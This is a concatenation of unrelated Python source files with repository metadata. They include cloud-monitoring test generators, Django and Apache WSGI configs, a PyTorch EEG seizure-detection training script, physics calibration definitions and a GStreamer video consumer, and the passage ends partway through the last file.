Returns generators for a given number of hosts and
zones. Hosts will be distributed across zones in round-robin style.
:param zone_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per zone
:param snap_vals: preset vals for ALL snapshot events
:return: generators for zone_num zones as specified
"""
mapping = [('host-{0}'.format(index), 'zone-{0}'.format(index % zone_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZONE_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Zone snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_volume_generators(volume_num, instance_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of volumes and
instances. Instances will be distributed across hosts in round-robin style.
:param update_vals: number of values from update event
:param update_events: number of events from update event
:param volume_num: number of volumes
:param instance_num: number of instances
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for volume_num volumes as specified
"""
mapping = [('volume-{0}'.format(index % volume_num),
'vm-{0}'.format(index))
for index in range(instance_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_VOLUME_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Volume snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_VOLUME_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Volume update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_stack_generators(stack_num, instance_and_volume_num,
snapshot_events=0, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning vm event generators.
Returns generators for a given number of stacks, instances and
volumes. Instances and Volumes will be distributed across stacks in
round-robin style.
:param update_vals: number of values from update event
:param update_events: number of events from update event
:param stack_num: number of stacks
:param volume_num: number of volumes
:param instance_num: number of instances
:param snapshot_events: number of snapshot events per host
:param snap_vals: preset vals for ALL snapshot events
:return: generators for volume_num volumes as specified
"""
mapping = [('stack-{0}'.format(index % stack_num),
'stack-vm-{0}'.format(index),
'stack-volume-{0}')
for index in range(instance_and_volume_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STACK_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Stack snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STACK_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Stack update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_consistency_generators(consistency_num, update_events=0,
snap_vals=None, update_vals=None):
"""A function for returning consistency event generators.
Returns generators for a given number of consistency events.
Instances will be distributed across hosts in round-robin style.
:param update_vals: number of values from update event
:param update_events: number of events from update event
:param consistency_num: number of consisteny events
:param snap_vals: preset vals for ALL snapshot events
:return: generators for consistency_num consistency events as specified
"""
test_entity_spec_list = []
if update_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_CONSISTENCY_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: consistency_num,
tg.NAME_KEY: 'Consistency update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_switch_generators(switch_num, host_num,
snapshot_events=0, snap_vals=None,
update_events=0, update_vals=None):
"""A function for returning switch events generators.
Returns generators for a given number of switches and hosts.
Hosts will be distributed across switches in round-robin style.
Switches are interconnected in a line.
:param update_vals: number of events from update event
:param update_events: number of values from update event
:param switch_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per zone
:param snap_vals: preset values for ALL snapshot events
:return: generators for switch events as specified
"""
mapping = [('host-{0}'.format(index), 'switch-{0}'.format(index %
switch_num))
for index in range(host_num)
]
test_entity_spec_list = []
if snapshot_events:
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_SWITCH_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Switch snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events:
update_vals = {} if not update_vals else update_vals
update_vals['vitrage_datasource_action'] = 'update'
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_SWITCH_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Switch update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_static_generators(switch_num=2, host_num=10,
snapshot_events=0, snap_vals=None,
update_events=0, update_vals=None):
"""A function for returning static datasource events generators.
Returns generators for a given number of routers, switches and hosts.
Hosts will be distributed across switches in round-robin style.
Switches are interconnected in a line.
:param switch_num: number of zones
:param host_num: number of hosts
:param snapshot_events: number of snapshot events per zone
:param snap_vals: preset values for ALL snapshot events
:param update_events: number of values from update event
:param update_vals: preset values for update event
:return: generators for static datasource events
"""
# TODO(yujunz) mock routers which connects all switches
mapping = [(host_index, host_index % switch_num)
for host_index in range(host_num)]
test_entity_spec_list = []
if snapshot_events > 0:
if snap_vals is None:
snap_vals = {}
snap_vals.update({
DSProps.DATASOURCE_ACTION: DatasourceAction.SNAPSHOT,
DSProps.SAMPLE_DATE: utcnow()})
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Static snapshot generator',
tg.NUM_EVENTS: snapshot_events
}
)
if update_events > 0:
if update_vals is None:
update_vals = {}
update_vals.update({
DSProps.DATASOURCE_ACTION: DatasourceAction.UPDATE,
DSProps.SAMPLE_DATE: utcnow()})
test_entity_spec_list.append(
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_STATIC_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: mapping,
tg.NAME_KEY: 'Static update generator',
tg.NUM_EVENTS: update_events
}
)
return tg.get_trace_generators(test_entity_spec_list)
def simple_nagios_alarm_generators(host_num,
events_num=0,
snap_vals=None):
"""A function for returning Nagios alarm event generators.
Returns generators for a given number of Nagios alarms.
:param host_num: number of hosts
:param events_num: number of snapshot alarms per hosts
:param snap_vals: preset vals for ALL snapshot events
:return: generators for zone_num zones as specified
"""
hosts = ['host-{0}'.format(index) for index in range(host_num)]
test_entity_spec_list = []
if events_num:
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Nagios alarm generator (alarm on)',
tg.NUM_EVENTS: max(events_num - len(hosts), 0)
})
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: tg.DRIVER_NAGIOS_SNAPSHOT_S,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Nagios alarm generator (alarm off)',
tg.NUM_EVENTS: len(hosts)
})
return tg.get_trace_generators(test_entity_spec_list)
def simple_zabbix_alarm_generators(host_num,
events_num=0,
snap_vals=None):
"""A function for returning Zabbix alarm event generators.
Returns generators for a given number of Zabbix alarms.
:param host_num: number of hosts
:param events_num: number of snapshot alarms per hosts
:param snap_vals: preset vals for ALL snapshot events
:return: generators for zone_num zones as specified
"""
hosts = ['host-{0}'.format(index) for index in range(host_num)]
test_entity_spec_list = []
if events_num:
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZABBIX_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Zabbix alarm generator (alarm on)',
tg.NUM_EVENTS: max(events_num - len(hosts), 0)
})
test_entity_spec_list.append({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_ZABBIX_SNAPSHOT_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: snap_vals,
tg.MAPPING_KEY: hosts,
tg.NAME_KEY: 'Zabbix alarm generator (alarm off)',
tg.NUM_EVENTS: len(hosts)
})
return tg.get_trace_generators(test_entity_spec_list)
def simple_doctor_alarm_generators(update_vals=None):
"""A function for returning Doctor alarm event generators.
Returns generators for a given number of Doctor alarms.
:param update_vals: preset values for ALL update events
:return: generators for alarms as specified
"""
test_entity_spec_list = [({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_DOCTOR_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: None,
tg.NAME_KEY: 'Doctor alarm generator',
tg.NUM_EVENTS: 1
})]
return tg.get_trace_generators(test_entity_spec_list)
def simple_collectd_alarm_generators(update_vals=None):
"""A function for returning Collectd alarm event generators.
Returns generators for a given number of Collectd alarms.
:param update_vals: preset values for ALL update events
:return: generators for alarms as specified
"""
test_entity_spec_list = [({
tg.DYNAMIC_INFO_FKEY: tg.DRIVER_COLLECTD_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.MAPPING_KEY: None,
tg.NAME_KEY: 'Collectd alarm generator',
tg.NUM_EVENTS: 1
})]
return tg.get_trace_generators(test_entity_spec_list)
def simple_aodh_alarm_notification_generators(alarm_num,
update_events=0,
update_vals=None):
"""A function for returning aodh alarm event generators.
Returns generators for a given number of Aodh alarms.
:param alarm_num: number of alarms
:param update_events: number of update alarms
:param update_vals: preset vals for ALL update events
:return: generators for alarm_num zones as specified
Returns generators for a given number of alarms and
instances.
"""
alarms = ['alarm-{0}'.format(index) for index in range(alarm_num)]
test_entity_spec_list = [
{tg.DYNAMIC_INFO_FKEY: tg.DRIVER_AODH_UPDATE_D,
tg.STATIC_INFO_FKEY: None,
tg.MAPPING_KEY: alarms,
tg.EXTERNAL_INFO_KEY: update_vals,
tg.NAME_KEY: 'Aodh update generator',
tg.NUM_EVENTS: update_events
}
]
return tg.get_trace_generators(test_entity_spec_list)
|
[
"gongwayne@hotmail.com"
] |
gongwayne@hotmail.com
|
797065c6157a5fa68bb700be7ae66a1e048fd278
|
a237987cb60e532b7828ad664c9ea852dd0399d2
|
/wujin/wsgi.py
|
9981fcc9c9165d86ab3ad7a6e578109b8048588b
|
[] |
no_license
|
liao820/wujin821
|
b37ea937e46d57ec4b8f2731d37ea477ab993f96
|
b71924fc602e7e487114641280a85bcb97192045
|
refs/heads/master
| 2023-04-21T23:20:17.888643
| 2021-05-16T14:42:08
| 2021-05-16T14:42:08
| 365,676,888
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 403
|
py
|
"""
WSGI config for wujin project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'wujin.settings')
application = get_wsgi_application()
|
[
"2869799543@qq.com"
] |
2869799543@qq.com
|
ae8c0e9c939e3f951a2745563148f89f1112682a
|
42e8317d12198c1cf6c0a3420242e17a745b33ee
|
/beneficiaries/beneficiaries/doctype/beneficiary/test_beneficiary.py
|
f1c38ca06ae89f62ee98cdd1f4863b69dc0827b0
|
[
"MIT"
] |
permissive
|
alkuhlani/beneficiaries
|
8fd50a1e606935b69fc6f4c03f0514a7a8345cdb
|
11208fe88e3e848458473d12836b157895646c5c
|
refs/heads/main
| 2023-07-19T06:26:45.968349
| 2021-08-31T06:02:15
| 2021-08-31T06:02:15
| 401,810,336
| 0
| 1
|
NOASSERTION
| 2021-08-31T18:47:58
| 2021-08-31T18:47:57
| null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2021, Baida and Contributors
# See license.txt
from __future__ import unicode_literals
# import frappe
import unittest
class TestBeneficiary(unittest.TestCase):
pass
|
[
"frappe@ubuntu.vm"
] |
frappe@ubuntu.vm
|
27898ef54858c5f3064cd761ca387ef291908a7b
|
80bc1e07b55aef418cf195c26f7861d17fb73711
|
/src/logger.py
|
ba22057890f26afa42fac9edaed7477ed511f25b
|
[] |
no_license
|
alexgeer/gravitys-name-bot
|
75d6f71da42b871cf20ef9f1579b408ad32cbd6c
|
5837a9624cd7d1696ab31b6c7dd7970ed0132a48
|
refs/heads/main
| 2023-01-28T06:10:43.835410
| 2020-12-06T00:04:00
| 2020-12-06T00:04:00
| 318,890,647
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
import logging
from sys import stdout
logger = logging.getLogger()
logging.basicConfig(level=logging.INFO)
logFormatter = logging.Formatter\
("%(name)-12s %(asctime)s %(levelname)-8s %(filename)s:%(funcName)s %(message)s")
consoleHandler = logging.StreamHandler(stdout) #set streamhandler to stdout
consoleHandler.setFormatter(logFormatter)
logger.addHandler(consoleHandler)
|
[
"geer.alex@gmail.com"
] |
geer.alex@gmail.com
|
578fc9fd60b9b25c349184e8f7a81c47e9d82794
|
0510e4947e51d132ef2d637c5522b41aa84848aa
|
/src/apache.wsgi
|
a7a7e2730499ae3bebf8dbeba3be7c7f9396ff26
|
[] |
no_license
|
esauro/akademic
|
c03c32e652d04fd0651b9a6a1f4f49eb2c1d0682
|
0174b7608f66c3626b8a1d19eadd9f01cc52ebfa
|
refs/heads/master
| 2021-01-18T05:39:21.220337
| 2010-10-15T13:34:58
| 2010-10-15T13:34:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 363
|
wsgi
|
#!/usr/bin/env python
import os
import sys
sys.stdout = sys.stderr
p = os.path.dirname(os.path.realpath(__file__))
sys.path.append(p)
sys.path.append(p+"/..")
os.environ['PYTHON_EGG_CACHE'] = os.path.join(p, 'egg-cache')
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
import django.core.handlers.wsgi
application = django.core.handlers.wsgi.WSGIHandler()
|
[
"rene@minicroso.(none)"
] |
rene@minicroso.(none)
|
472a3216a25433e238d084a88264ae6008207241
|
8ef8e6818c977c26d937d09b46be0d748022ea09
|
/cv/detection/autoassign/pytorch/mmdet/core/hook/checkloss_hook.py
|
66a3c1176255137f17a08288cd4a4b82aca77323
|
[
"Apache-2.0"
] |
permissive
|
Deep-Spark/DeepSparkHub
|
eb5996607e63ccd2c706789f64b3cc0070e7f8ef
|
9d643e88946fc4a24f2d4d073c08b05ea693f4c5
|
refs/heads/master
| 2023-09-01T11:26:49.648759
| 2023-08-25T01:50:18
| 2023-08-25T01:50:18
| 534,133,249
| 7
| 6
|
Apache-2.0
| 2023-03-28T02:54:59
| 2022-09-08T09:07:01
|
Python
|
UTF-8
|
Python
| false
| false
| 705
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
from mmcv.runner.hooks import HOOKS, Hook
@HOOKS.register_module()
class CheckInvalidLossHook(Hook):
"""Check invalid loss hook.
This hook will regularly check whether the loss is valid
during training.
Args:
interval (int): Checking interval (every k iterations).
Default: 50.
"""
def __init__(self, interval=50):
self.interval = interval
def after_train_iter(self, runner):
if self.every_n_iters(runner, self.interval):
assert torch.isfinite(runner.outputs['loss']), \
runner.logger.info('loss become infinite or NaN!')
|
[
"jia.guo@iluvatar.ai"
] |
jia.guo@iluvatar.ai
|
38a1c9d2ddfc2c0402295ab8f9bb7a0641dcc58c
|
1e07111c8d3173fa931923a86c43555c2d58948a
|
/CHB/train_model.py
|
3160ec136a04d8c825e9fdacaacf4217a9e5ec61
|
[] |
no_license
|
whubaichuan/Epilepsy
|
07c29639ba8da5f6f3f191d32e0ac560159839ca
|
88cee770fd3fc42e14d876d22fafc0dc911dab2c
|
refs/heads/master
| 2023-08-05T04:14:20.000682
| 2021-09-29T21:23:04
| 2021-09-29T21:23:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,558
|
py
|
# -*- coding: utf-8 -*-
import os
import h5py
import time
import copy
import tqdm
import argparse
import numpy as np
import scipy.io as sio
import os.path as osp
import torch
import torch.nn as nn
import torch.optim as optim
from torch.utils import data
import torch.nn.functional as F
from torch.autograd import Variable
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import LambdaLR, StepLR, MultiStepLR, ExponentialLR, ReduceLROnPlateau
from model.network_FC1D import Net
# from model.network_FC1D_50 import Net
parser = argparse.ArgumentParser(description='PyTorch Epilepsy')
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test_batch_size', type=int, default=1000, metavar='N',
help='input batch size for testing (default: 1000)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.0001, metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--gamma', type=float, default=0.0005, metavar='M',
help='learning rate decay factor (default: 0.0005)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=20, metavar='N',
help='how many batches to wait before '
'logging training status')
parser.add_argument('--gpuNum', type=str, default='3',
help='number of gpu for test')
parser.add_argument('--foldNum', type=str, default='Exp1',
help='fold to evaluate in 3 fold cross val')
parser.add_argument('--config', type=str, default='FIRST',
help='configuration to load data')
parser.add_argument('--data_path', type=str, default='media/user_home2/EEG/Epilepsy/data',
help='folder that contains the database for training')
parser.add_argument('--save', type=str, default='model.pt',
help='file on which to save model weights')
parser.add_argument('--outf', default='/media/user_home2/EEG/Epilepsy/models', help='folder to output model')
parser.add_argument('--resume', default='', help="path to model (to continue training)")
parser.add_argument('--finetune', default='', help="path to model weights for finetuning")
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
kwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}
# set GPU number
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpuNum
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# Load dataset for training and validation
path_to_data = args.data_path
class Dataset(data.Dataset):
'Characterizes a dataset for PyTorch'
def __init__(self, list_IDs, labels, transform=None):
'Initialization'
self.labels = labels
self.list_IDs = list_IDs
self.transform = transform
def __len__(self):
'Denotes the total number of samples'
return len(self.list_IDs)
def __getitem__(self, index):
'Generates one sample of data'
# Select sample
ID = self.list_IDs[index]
# Load data and get label
y = self.labels[ID]
X = np.load(path_to_data +ID + '.npy')
X = np.transpose(X) #23x1024
X = np.expand_dims(X, axis=0) #1x23x1024
if self.transform:
X = self.transform(X)
return X, y
path_to_dicts = '/media/user_home1/EEG/Epilepsy/data/configs/'
partition = np.load(path_to_dicts + 'partitions_' + args.config + args.foldNum+'.npy').item()
labels = np.load(path_to_dicts + 'labels_' + args.config + args.foldNum + '.npy').item()
image_datasets = {x: Dataset(partition[x], labels,transform=transforms.Compose([transforms.ToTensor()])) for x in ['train', 'validation']}
dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=args.batch_size, shuffle=True, num_workers=4) for x in ['train', 'validation']}
train_loader = dataloaders['train']
test_loader = dataloaders['validation']
dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'validation']}
print('training dataset size:', dataset_sizes['train'])
print('Validation dataset size:', dataset_sizes['validation'])
print('Done creating dataloader \n')
# custom weights initialization called on netG and netD
##
def weights_init(m):
classname = m.__class__.__name__
if classname.find('Conv') != -1:
m.weight.data.normal_(0.00, 0.01)
m.bias.data.fill_(0.1)
elif classname.find('GroupNorm') != -1:
m.weight.data.fill_(1)
m.bias.data.zero_()
# Load Network
model = Net()
model.apply(weights_init)
res_flag = 0
if args.finetune != '': # For training from a previously saved state
model.load_state_dict(torch.load(args.finetune))
res_flag = 1
# freeze and unfreeze layers
for param in model.parameters():
param.requires_grad = False
print(model)
if args.cuda:
model.cuda()
load_model = False
if osp.exists(args.save):
with open(args.save, 'rb') as fp:
state = torch.load(fp)
model.load_state_dict(state)
load_model = True
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum)
criterion = nn.CrossEntropyLoss()
def train(epoch, criterion, optimizer):
model.train()
train_loss = 0
correct = 0
running_loss = 0.0
running_corrects = 0
for data, target in tqdm.tqdm(dataloaders['train'], total=len(dataloaders['train']), desc='Batch'):
data = data.to(device)
data = torch.squeeze(data)
data = data.float()
target = target.to(target)
if args.cuda:
data, target = data.cuda(), target.cuda()
optimizer.zero_grad()
output = model(data)
loss = criterion(output, target)
train_loss += loss.data
sm = nn.Softmax(dim=1)
output_sm = sm(output)
_, preds = torch.max(output_sm, 1)
running_loss += loss.item() * data.size(0)
running_corrects += torch.sum(preds == target.data)
loss.backward()
optimizer.step()
epoch_loss = running_loss / dataset_sizes['train']
epoch_acc = running_corrects.double() / dataset_sizes['train']
line_to_save_train = 'Train set: Average loss: {:.4f} Accuracy: {}/{} {:.4f}\n'.format(epoch_loss,
running_corrects,
len(train_loader.dataset),
epoch_acc)
with open(args.outf+'/ACC_train.txt','a') as f:
f.write(line_to_save_train)
print(line_to_save_train)
def test(epoch):
model.eval()
test_loss = 0
correct = 0
running_loss = 0.0
running_corrects = 0
for data, target in tqdm.tqdm(dataloaders['validation'], total=len(dataloaders['validation']), desc='Batch'):
data = data.to(device)
data = data.float()
data = torch.squeeze(data)
target = target.to(target)
if args.cuda:
data, target = data.cuda(), target.cuda()
output = model(data)
sm = nn.Softmax(dim=1)
output_sm = sm(output)
_, preds = torch.max(output_sm, 1)
loss = criterion(output, target)
running_loss += loss.item() * data.size(0)
running_corrects += torch.sum(preds == target.data)
epoch_loss = running_loss / dataset_sizes['validation']
epoch_acc = running_corrects.double() / dataset_sizes['validation']
line_to_save_test = 'Test set: Average loss: {:.4f} Accuracy: {}/{} {:.4f}\n'.format(epoch_loss,
running_corrects,
dataset_sizes['validation'],
epoch_acc)
with open(args.outf+'/ACC_test.txt','a') as f:
f.write(line_to_save_test)
print(line_to_save_test)
return epoch_loss, epoch_acc
def adjust_learning_rate(optimizer, epoch):
#lr = args.lr * (gamma ** (step))
lr = args.lr * (0.1 ** (epoch // 50)) * (0.1 ** (epoch // 90))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
best_loss = None
if load_model:
best_loss = test(0)
if res_flag == 0:
Ei = 1
else:
if args.resume[-6] == '_':
Ei = int(args.resume[-5]) + 1
print('-' * 89)
print('Resuming from epoch %d' % (Ei))
print('-' * 89)
else:
Ei = int(args.resume[-6:-4]) + 1
print('-' * 89)
print('Resuming from epoch %d' % (Ei))
print('-' * 89)
try:
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(Ei, args.epochs + 1):
epoch_start_time = time.time()
train(epoch, criterion, optimizer)
test_loss, test_acc = test(epoch)
if test_acc> best_acc:
best_acc = test_acc
best_model_wts = copy.deepcopy(model.state_dict())
filename = args.outf + '/complete_model'+ '_BEST.pth'
state = {'epoch': epoch , 'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict() }
torch.save(state, filename)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s ({:.2f}h)'.format(
epoch, time.time() - epoch_start_time, (time.time() - epoch_start_time)/3600.0))
print('-' * 89)
# Save trained model
filename = args.outf + '/complete_model_' + str(epoch)+ '.pth'
state = {'epoch': epoch , 'state_dict': model.state_dict(),
'optimizer': optimizer.state_dict() }
torch.save(state, filename)
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
|
[
"c.gomez10@uniandes.edu.co"
] |
c.gomez10@uniandes.edu.co
|
86f27cb684ca6c3bd735bec9826954a9689029fc
|
b22588340d7925b614a735bbbde1b351ad657ffc
|
/athena/LArCalorimeter/LArExample/LArCalibProcessing/python/OFCDefinitions.py
|
630492002d95e84b59dd3ce6c341bcbada3c6668
|
[] |
no_license
|
rushioda/PIXELVALID_athena
|
90befe12042c1249cbb3655dde1428bb9b9a42ce
|
22df23187ef85e9c3120122c8375ea0e7d8ea440
|
refs/heads/master
| 2020-12-14T22:01:15.365949
| 2020-01-19T03:59:35
| 2020-01-19T03:59:35
| 234,836,993
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,026
|
py
|
# Copyright (C) 2002-2017 CERN for the benefit of the ATLAS collaboration
from collections import namedtuple
OFCDefinitions=namedtuple("OFCDefinitions",
["Algoname",
"Nsamples",
"Nphase",
"Dphase",
"PhysAutoCorr",
"useDelta",
"KeyOFC",
"KeyShape",
"FolderOFC",
"FolderShape",
"FolderOFCPicked",
"FolderShapePicked",
"ReadDSPConfig",
"DSPConfigFolder"
]
)
OFCDef_4Samples=OFCDefinitions("OFC4samples",
Nsamples=4,
Nphase=8,
# hack for shifted OFC
#Nphase=16,
Dphase=3,
PhysAutoCorr=(False,True),
useDelta=(0,0),
KeyOFC=("LArOFC_4_0","LArOFC_4_0_mu"),
KeyShape="LArShape_4_0",
FolderOFC="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/4samples3bins17phases",
FolderShape="/LAR/ElecCalibOfl/Shape/RTM/4samples3bins17phases",
FolderOFCPicked="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/4samples1phase",
FolderShapePicked="/LAR/ElecCalibOfl/Shape/RTM/4samples1phase",
ReadDSPConfig=True,
DSPConfigFolder="/LAR/Configuration/DSPConfiguration"
)
OFCDef_5Samples=OFCDefinitions("OFC5samples",
Nsamples=5,
Nphase=8,
# hack for shifted OFC
#Nphase=16,
Dphase=3,
PhysAutoCorr=(False,True),
useDelta=(0,0),
KeyOFC=("LArOFC_5_0","LArOFC_5_0_mu"),
KeyShape="LArShape_5_0",
FolderOFC="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/5samples3bins17phases",
FolderShape="/LAR/ElecCalibOfl/Shape/RTM/5samples3bins17phases",
FolderOFCPicked="/LAR/ElecCalibOfl/OFC/PhysWave/RTM/5samples1phase",
FolderShapePicked="/LAR/ElecCalibOfl/Shape/RTM/5samples1phase",
ReadDSPConfig=True,
DSPConfigFolder="/LAR/Configuration/DSPConfiguration"
)
OFCDefs=(OFCDef_5Samples,OFCDef_4Samples)
#OFCDefsRepro=(OFCDef_4Samples,0)
|
[
"rushioda@lxplus754.cern.ch"
] |
rushioda@lxplus754.cern.ch
|
ee9e07d81c1e093c2c6a65b7fd4a8d2c5b8b737d
|
cdc3ee98954fc86bc816980e0dab767be3bbb0b5
|
/app.py
|
6d3ef9cbbf94259099da5bfd94d63b8d8c9c0bf1
|
[] |
no_license
|
uniray7/resp-pi-cam
|
2199808569d695276032e1201572730a630edcac
|
98d0870c1719898ea9d889f432f007f479270fd4
|
refs/heads/master
| 2020-12-30T13:40:17.320095
| 2017-05-14T13:02:25
| 2017-05-14T13:02:25
| 91,242,689
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,191
|
py
|
import gi
gi.require_version('Gst', '1.0')
from gi.repository import Gst
import cv2
import numpy
img_arr =None
def new_sample(appsink):
global img_arr
sample = appsink.emit('pull-sample')
buf = sample.get_buffer()
caps = sample.get_caps()
print caps.get_structure(0).get_value('format')
print caps.get_structure(0).get_value('height')
print caps.get_structure(0).get_value('width')
print buf.get_size()
arr = numpy.ndarray(
(caps.get_structure(0).get_value('height'),
caps.get_structure(0).get_value('width'),
3),
buffer=buf.extract_dup(0, buf.get_size()),
dtype=numpy.uint8)
img_arr = arr
return Gst.FlowReturn.OK
def start_consume():
Gst.init(None)
pipeline = Gst.Pipeline()
tcpsrc = Gst.ElementFactory.make('tcpclientsrc','source')
tcpsrc.set_property("host", "172.20.10.12")
tcpsrc.set_property("port", 5000)
gdepay = Gst.ElementFactory.make('gdpdepay', 'gdepay')
rdepay = Gst.ElementFactory.make('rtph264depay')
avdec = Gst.ElementFactory.make('avdec_h264')
vidconvert = Gst.ElementFactory.make('videoconvert')
asink = Gst.ElementFactory.make('appsink', 'sink')
asink.set_property('sync', False)
asink.set_property('emit-signals', True)
asink.set_property('drop', True)
